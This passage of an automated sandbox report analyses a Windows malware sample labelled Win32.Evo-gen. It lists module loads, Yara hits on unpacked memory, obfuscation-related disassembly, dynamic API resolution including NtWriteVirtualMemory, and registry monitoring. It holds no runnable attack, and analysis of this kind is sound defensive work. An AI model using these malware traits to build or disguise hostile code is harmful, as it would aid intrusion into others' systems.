            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe.2800000.1.unpack
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe.2800000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe.2800000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2679644155.000000000232C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1439006094.000000007FD80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02817AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02817AC0
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeStatic PE information: real checksum: 0xf3642 should be: 0xec870
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_028032F0 push eax; ret 0_2_0280332C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0282A2F4 push 0282A35Fh; ret 0_2_0282A357
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0281D20C push ecx; mov dword ptr [esp], edx0_2_0281D211
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02806372 push 028063CFh; ret 0_2_028063C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02806374 push 028063CFh; ret 0_2_028063C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0282A0AC push 0282A125h; ret 0_2_0282A11D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02813027 push 02813075h; ret 0_2_0281306D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02813028 push 02813075h; ret 0_2_0281306D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0282A1F8 push 0282A288h; ret 0_2_0282A280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0282A144 push 0282A1ECh; ret 0_2_0282A1E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0280673E push 02806782h; ret 0_2_0280677A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02806740 push 02806782h; ret 0_2_0280677A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0280C528 push ecx; mov dword ptr [esp], edx0_2_0280C52D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0280D55C push 0280D588h; ret 0_2_0280D580
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0280CBA8 push 0280CD2Eh; ret 0_2_0280CD26
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02819B58 push 02819B90h; ret 0_2_02819B88
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02829B70 push 02829D8Eh; ret 0_2_02829D86
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_028178C8 push 02817945h; ret 0_2_0281793D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0280C8D6 push 0280CD2Eh; ret 0_2_0280CD26
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02816902 push 028169AFh; ret 0_2_028169A7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02816904 push 028169AFh; ret 0_2_028169A7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02815E38 push ecx; mov dword ptr [esp], edx0_2_02815E3A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0282DF18 push eax; ret 0_2_0282DFE8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02812F1C push 02812F92h; ret 0_2_02812F8A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02817CA6 push 02817CE0h; ret 0_2_02817CD8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02817CA8 push 02817CE0h; ret 0_2_02817CD8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02819B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02819B94
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
